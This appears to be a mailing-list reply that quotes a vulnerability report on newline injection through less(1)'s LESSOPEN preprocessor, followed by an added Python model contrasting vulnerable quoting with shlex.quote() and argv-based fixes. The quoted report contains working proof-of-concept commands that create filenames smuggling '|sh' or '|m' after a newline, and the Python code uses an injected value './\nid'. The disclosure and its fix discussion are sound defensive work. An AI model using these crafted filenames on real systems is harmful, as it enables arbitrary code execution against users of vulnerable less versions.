Jakub Wilk <jw...@jwilk.net> writes:
> less(1) does not correctly escape newlines in pathnames when
> constructing the command line of the input preprocessor. If a user ran
> less(1) on files with untrusted names, this could result in execution
> of arbitrary code.
>
> The input preprocessor is enabled by the LESSOPEN environment variable.
> But if you didn't set it, don't worry, because zless(1) (or xzless(1),
> or zstdless(1)) sets it for you:
>
> $ echo 'cowsay pwned' > './\' && touch "$(printf '\n|sh')"
> $ zless ./*
>  _______
> < pwned >
>  -------
>         \   ^__^
>          \  (oo)\_______
>             (__)\       )\/\
>                 ||----w |
>                 ||     ||
> ./
> |sh (file 1 of 2) (END) - Next: ./\
>
> On Ubuntu systems, $LESSOPEN is set in ~/.bashrc by default, so the
> bug can be exploited even without the wrapper:
>
Unfortunately, it looks like we're the same in Gentoo.

> $ mkdir m "$(printf '\n|m')" && touch "$(printf '\n|m/oo')" && echo 'cowsay pwned' > m/oo && chmod +x m/oo
> $ less ./*/*
>  _______
> < pwned >
>  -------
>         \   ^__^
>          \  (oo)\_______
>             (__)\       )\/\
>                 ||----w |
>                 ||     ||
> ./
> |m/oo (file 1 of 2) (END) - Next: ./m/oo
>
> Upstream fix:
> https://github.com/gwsw/less/commit/007521ac3c95bc76

Thanks. Any idea if upstream plans to backport it? It doesn't apply cleanly, I think, to the last release, 643 (653 is a beta), but I'll try to do it now.
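The report above describes a classic bug class: a program builds a shell command line by substituting a filename into a template ($LESSOPEN here) and its quoting routine does not treat newline as a shell metacharacter, so a filename beginning with a newline becomes a second command. The following Python model is an added example written for this thread; it is not less(1)'s code and does not reproduce less's actual shell_quote() logic. It assumes a template of the shape zless(1) uses ("gzip -cdfq -- %s", constructed here; check `echo "$LESSOPEN"` on your own system) and shows three things: a blocklist-style quoter that forgets newline, the same substitution done with shlex.quote(), and the better fix of never going through a shell at all.

```python
"""Model of newline injection through a LESSOPEN-style %s template.

Added example for the thread above. Not less(1)'s code: the quoting
routine below is a deliberately simplified stand-in for the bug class.
"""
import shlex
import subprocess

# Assumed preprocessor template (constructed for this example; the real
# value of $LESSOPEN varies per distribution and wrapper script).
LESSOPEN = "gzip -cdfq -- %s"

# Blocklist quoter: wraps the name in double quotes only if it contains one
# of these characters. Newline is not in the list. That omission is the
# modelled bug.
BLOCKLIST = set(" \t\"'`$\\|&;<>()[]*?#~")


def blocklist_quote(name: str) -> str:
    """Quote only when a blocklisted character is present (vulnerable model)."""
    if not any(c in BLOCKLIST for c in name):
        return name
    # Characters that stay special inside double quotes get backslashes.
    escaped = (name.replace("\\", "\\\\").replace('"', '\\"')
                   .replace("$", "\\$").replace("`", "\\`"))
    return '"' + escaped + '"'


def build_cmd_vulnerable(template: str, name: str) -> str:
    """Substitute %s using the blocklist quoter."""
    return template.replace("%s", blocklist_quote(name))


def build_cmd_hardened(template: str, name: str) -> str:
    """Substitute %s using shlex.quote(): allowlist-based, single-quotes
    anything outside [A-Za-z0-9@%+=:,./-], so newline is covered."""
    return template.replace("%s", shlex.quote(name))


def preprocessor_argv(template: str, name: str) -> list:
    """Best fix: do not build a shell string at all. Tokenize the template
    once and pass the filename as its own argv element. Assumes %s appears
    as a whole word in the template."""
    return [name if tok == "%s" else tok for tok in shlex.split(template)]


def shell_statements(cmd: str) -> list:
    """Split a command line into statements the way sh would at unquoted
    newlines and ';'. Simplified: handles '...', "...", and backslash
    escapes; ignores heredocs, '&&', '||' and '|'."""
    stmts, cur, quote, escaped = [], [], None, False
    for ch in cmd:
        if escaped:
            cur.append(ch)
            escaped = False
            continue
        if ch == "\\" and quote != "'":
            escaped = True
            cur.append(ch)
            continue
        if quote:
            if ch == quote:
                quote = None
            cur.append(ch)
            continue
        if ch in "'\"":
            quote = ch
            cur.append(ch)
            continue
        if ch in "\n;":
            if "".join(cur).strip():
                stmts.append("".join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    if "".join(cur).strip():
        stmts.append("".join(cur).strip())
    return stmts


if __name__ == "__main__":
    # Attacker-controlled name: a newline followed by a command (constructed).
    evil = "./\nid"
    print(shell_statements(build_cmd_vulnerable(LESSOPEN, evil)))  # two statements
    print(shell_statements(build_cmd_hardened(LESSOPEN, evil)))    # one statement
    argv = preprocessor_argv(LESSOPEN, evil)
    print(argv)
    # subprocess.run(argv, stdout=subprocess.PIPE) would hand the name to
    # gzip as one argument; no shell ever parses it.
```

The vulnerable path yields `["gzip -cdfq -- ./", "id"]`: the shell would run gzip on the directory and then run `id`, which is exactly the shape of the cowsay demonstration in the report. shlex.quote() single-quotes the whole name, so the newline is data, and the argv form removes the quoting problem entirely, which is the approach to prefer when the preprocessor is under your control.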